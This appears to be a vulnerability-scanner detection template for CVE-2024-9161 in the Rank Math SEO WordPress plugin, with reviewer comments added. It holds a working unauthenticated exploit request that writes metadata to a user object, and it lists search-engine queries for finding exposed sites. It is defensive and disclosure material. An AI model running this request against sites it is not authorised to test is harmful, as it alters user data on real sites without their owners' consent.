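# Detection template for CVE-2024-9161 (Rank Math SEO, missing capability
# check on the REST metadata update route, CWE-862).
#
# The page had this template collapsed onto two physical lines, which is not
# parseable YAML; the block structure is restored here with keys and values
# unchanged. Indentation inside the raw request bodies is a reconstruction.
#
# Review notes:
# - State-changing check (tagged `intrusive`): the second request asks the
#   target to store a `meta_<random>` key on a user object whose ID is drawn
#   from 1-9. Record the generated key for each run so it can be removed from
#   the target afterwards.
# - Defenders can look for the same signal in web or WAF logs: POST requests
#   to /wp-json/rankmath/v1/updateMeta that carry no authenticated session.
id: CVE-2024-9161

info:
  name: Rank Math SEO < 1.0.229 - Unauthenticated User and Term Metadata Insert/Update/Deletion
  author: Kazgangap
  severity: medium
  description: |
    Rank Math SEO – AI SEO Tools to Dominate SEO Rankings plugin for WordPress contains a missing capability check on 'update_metadata' in all versions up to 1.0.228, letting unauthenticated attackers insert, update, or delete metadata, including user and term metadata, potentially causing loss of access to the admin dashboard.
  impact: |
    Unauthenticated attackers can modify or delete metadata, leading to data loss and potential denial of access to the admin dashboard.
  remediation: |
    Update to version 1.0.229 or later.
  reference:
    - https://wpscan.com/vulnerability/95be2559-f0e2-4e98-9bef-3989df0d25bf/
    - https://plugins.trac.wordpress.org/browser/seo-by-rank-math/trunk/includes/rest/class-shared.php#L120
    - https://plugins.trac.wordpress.org/browser/seo-by-rank-math/trunk/includes/rest/class-shared.php#L161
    - https://plugins.trac.wordpress.org/browser/seo-by-rank-math/trunk/includes/rest/class-shared.php#L162
    - https://plugins.trac.wordpress.org/browser/seo-by-rank-math/trunk/includes/rest/class-shared.php#L64
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L
    cvss-score: 6.5
    cve-id: CVE-2024-9161
    cwe-id: CWE-862
    epss-score: 0.23642
    epss-percentile: 0.96123
    cpe: cpe:2.3:a:rankmath:seo:*:*:*:*:free:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: rankmath
    product: seo
    framework: wordpress
    shodan-query: http.html:"/wp-content/plugins/seo-by-rank-math/"
    fofa-query: body="/wp-content/plugins/seo-by-rank-math/"
    publicwww-query: "/wp-content/plugins/seo-by-rank-math/"
  tags: cve,cve2024,wordpress,seo-by-rank-math,wp-plugin,wpscan,rankmath,intrusive,vkev

# Per-run random values: `objectid` selects the user ID written to and `data`
# is used as both the metadata key and its value in the second request.
variables:
  objectid: "{{rand_int(1,9)}}"
  data: "meta_{{to_lower(rand_text_alpha(12))}}"

# The write request (http 2) is only evaluated when the fingerprint request
# (http 1) matched.
flow: http(1) && http(2)

http:
  # Request 1: plugin fingerprint. The matcher is `internal`, so it gates the
  # flow without producing a finding of its own.
  # NOTE(review): only the string "Rank Math" is checked; the readme version
  # is not compared against 1.0.229, so patched installs still reach
  # request 2 and receive the write attempt.
  - raw:
      - |
        GET /wp-content/plugins/seo-by-rank-math/readme.txt HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "Rank Math")'
        condition: and
        internal: true

  # Request 2: unauthenticated metadata update against the plugin REST route.
  # NOTE(review): the matcher keys on the response shape (HTTP 200, JSON
  # content type, and the strings "slug", "true", "schemas" in the body); the
  # key is never read back, so confirm on the target that the metadata was
  # actually stored before reporting a finding.
  - raw:
      - |
        POST /wp-json/rankmath/v1/updateMeta HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {
          "objectType": "user",
          "objectID": {{objectid}},
          "meta": {
            "{{data}}": "{{data}}"
          }
        }

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body,"slug", "true", "schemas")'
          - 'contains(content_type, "application/json")'
          - "status_code == 200"
        condition: and
# NOTE(review): the digest below was presumably computed over the upstream
# template text; after any edit (including these comments) treat the template
# as unsigned until it has been re-signed.
# digest: 4a0a0047304502207ee5518b3a42d55d0de2eb933b8a5811778cb5b9a7cae1d69bce7ad5623542cc022100f0f6444bbaa94971ce61f0ce65b6896dce6131a2928c8e392d74e4668e104705:922c64590222798bb761d5b6d8e72950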